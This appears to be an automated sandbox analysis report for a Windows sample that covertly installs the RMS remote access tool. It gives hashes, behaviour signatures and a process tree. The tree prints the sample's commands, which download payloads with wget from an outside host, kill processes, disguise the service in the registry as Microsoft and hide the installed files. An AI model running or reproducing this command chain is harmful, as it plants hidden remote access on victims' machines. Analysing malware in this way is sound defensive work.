Analysis
-
max time kernel
90s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
27-11-2022 11:58
General
-
Target
a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe
-
Size
1.2MB
-
MD5
dceb5dd827f2e4b5ebec62148ad5d369
-
SHA1
8ca65ba8cff5ad56f9469c99c09df51ceb8c673f
-
SHA256
a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85
-
SHA512
68132010ce7a496f80b94b773fc49d818dc2c90ac56a0ba3429237f4315af488dea336ad387202f770be4144b6d631816da702705c66f93512aa1679a242514e
-
SSDEEP
24576:baUxvxK4FrkaZYDch6nRpjGjRXKe9/EtkhaEYW9RR3eBTFnI5gg:9JKcZY4h6nmRpSTmX3U5Ih
Malware Config
Signatures
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Executes dropped EXE 4 IoCs
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
UPX packed file 5 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 4 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 2 IoCs
-
Runs .reg file with regedit 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe"C:\Users\Admin\AppData\Local\Temp\a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\exes\scrgnp.scr"C:\Users\Admin\AppData\Local\Temp\exes\scrgnp.scr" /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exes\io.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\exes\setup.bat" "4⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exes\bat.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\exes\bat.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping xnext.esy.es -n setup7⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\exes\wget.exewget.exe http://xnext.esy.es/files_7z/files.part7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\exes\wget.exewget.exe http://xnext.esy.es/reg_users/7/regedit.reg7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\exes\7z.exe7z.exe x -y -p1895 files.7z7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq wget.exe" /NH5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "wget.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq 7z.exe" /NH5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "7z.exe"5⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /v FUSClientPath /t REG_SZ /d "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\rfusclient.exe" /f5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\*.*"5⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\vp8decoder.dll"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h "C:\Windows\en-US\DRVSTORE\Dism\ru-RU\security\ApplicationId\PolicyManagement\PolicyManagement\System\32\Web\Histoty\vp8encoder.dll"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet00setup\services\RManService" /v DisplayName /t REG_SZ /d "Microsoft Corporation" /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet00setup\services\RManService" /v Description /t REG_SZ /d "Microsoft Windows" /f5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\exes\7z.dllFilesize
893KB
MD504ad4b80880b32c94be8d0886482c774
SHA1344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
SHA256a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338
SHA5123e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb
-
C:\Users\Admin\AppData\Local\Temp\exes\7z.exeFilesize
160KB
MD5a51d90f2f9394f5ea0a3acae3bd2b219
SHA120fea1314dbed552d5fedee096e2050369172ee1
SHA256ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
C:\Users\Admin\AppData\Local\Temp\exes\7z.exeFilesize
160KB
MD5a51d90f2f9394f5ea0a3acae3bd2b219
SHA120fea1314dbed552d5fedee096e2050369172ee1
SHA256ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
C:\Users\Admin\AppData\Local\Temp\exes\bat.batFilesize
265B
MD5fa98674ea4d57b81408a0d5ee71ab67e
SHA1976bbb5cdd94e1ee49c4bc915e155f97db79548f
SHA2562b18f2a2e2d2ed64847fa147bb1907a4853813602faef4657a49c769737ad875
SHA51222a053ba206bc6645647baffa9bdd1ad33cc78641c53b96ad533b32b22762cd24c998869b1b13f74a193e6782a9287faad7bca5dad70ee18484c44613d71368f
-
C:\Users\Admin\AppData\Local\Temp\exes\bat.vbsFilesize
113B
MD59a9ec59df719a15b2cadb19ecce9adfd
SHA1172b551d1d04c93c8bb52ead5a88b084e3c8f469
SHA2569413f4a4084d653e2acd3ea80282a261d8356f2605ae7a502ef364c54d4ab2d8
SHA5121f1f678802ad5d5b86824ae789d8ebc64abc8d84686118051f73cfb0f3c6ff41ef19478f4073040d864fc697fe047bf7cd715632eb9b1b1f4d6e4e5799907b20
-
C:\Users\Admin\AppData\Local\Temp\exes\io.vbsFilesize
126B
MD5c04724f30bf56ecdf84ca7f61a4799f4
SHA1631654478cbcddf1a2c5af87ccee5ae4af908f26
SHA256e4e857e2d34b7da5771e2dd415262474318007140f53e2487e5bc98377f49dce
SHA512654673a13f81c0027ac973f47684ca104616112a54fc16fd69dd94681fc1ce643e35262769e70e3c9e477bdfe78b6e4a694dd4db3cde1b4a8fbab329442bb935
-
C:\Users\Admin\AppData\Local\Temp\exes\scrgnp.scrFilesize
1015KB
MD5c7e21519abf0c17a42401038cc330c06
SHA1588240cb95ea582f9179e3f12ebb32b902afebe1
SHA256e02bbe16eb180e091bbe3eb85b50b9c58729cbbcc87eaaee5f68b8ca94a45ded
SHA5127a15db5e7a7c5883b20565d222c6dbe57780b140f575e92d044eacc26736a40ffd827124b7fd18eeb8ac01c080cea3f0f1a5eea7a55ae9c52d4526f6356780d3
-
C:\Users\Admin\AppData\Local\Temp\exes\scrgnp.scrFilesize
1015KB
MD5c7e21519abf0c17a42401038cc330c06
SHA1588240cb95ea582f9179e3f12ebb32b902afebe1
SHA256e02bbe16eb180e091bbe3eb85b50b9c58729cbbcc87eaaee5f68b8ca94a45ded
SHA5127a15db5e7a7c5883b20565d222c6dbe57780b140f575e92d044eacc26736a40ffd827124b7fd18eeb8ac01c080cea3f0f1a5eea7a55ae9c52d4526f6356780d3
-
C:\Users\Admin\AppData\Local\Temp\exes\setup.batFilesize
15KB
MD5ac2dba570bc68d20936c7c2adead2967
SHA1ff753931f0ca25dafdd0b262f0726ca9ebf7c6d3
SHA256f451f54ec3cf60fdfde055bd146f483b89a43b0bf8d16ffaa8981e32030d4978
SHA51259f31b3be442e3c682076550b4126bf461b2c2b28c15324bf4e89394192d7e8d7290abd3b7d79307eb3f98a8afcaf1e0005f36715a26f9cd13154fb9d69030b0
-
C:\Users\Admin\AppData\Local\Temp\exes\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Temp\exes\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Temp\exes\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
memory/620-138-0x0000000000000000-mapping.dmp
-
memory/932-170-0x0000000000000000-mapping.dmp
-
memory/1772-156-0x0000000000000000-mapping.dmp
-
memory/1976-139-0x0000000000000000-mapping.dmp
-
memory/2140-161-0x0000000000000000-mapping.dmp
-
memory/2228-140-0x0000000000000000-mapping.dmp
-
memory/2328-135-0x0000000000000000-mapping.dmp
-
memory/2344-155-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/2344-153-0x0000000000000000-mapping.dmp
-
memory/2464-171-0x0000000000000000-mapping.dmp
-
memory/2544-169-0x0000000000000000-mapping.dmp
-
memory/2588-164-0x0000000000000000-mapping.dmp
-
memory/2744-165-0x0000000000000000-mapping.dmp
-
memory/3112-163-0x0000000000000000-mapping.dmp
-
memory/3168-160-0x0000000000000000-mapping.dmp
-
memory/3228-148-0x0000000000000000-mapping.dmp
-
memory/3452-147-0x0000000000000000-mapping.dmp
-
memory/3536-168-0x0000000000000000-mapping.dmp
-
memory/3560-167-0x0000000000000000-mapping.dmp
-
memory/3720-142-0x0000000000000000-mapping.dmp
-
memory/4008-141-0x0000000000000000-mapping.dmp
-
memory/4364-159-0x0000000000000000-mapping.dmp
-
memory/4496-145-0x0000000000000000-mapping.dmp
-
memory/4524-162-0x0000000000000000-mapping.dmp
-
memory/4616-144-0x0000000000000000-mapping.dmp
-
memory/4724-152-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/4724-149-0x0000000000000000-mapping.dmp
-
memory/5008-132-0x0000000000000000-mapping.dmp
-
memory/5116-166-0x0000000000000000-mapping.dmp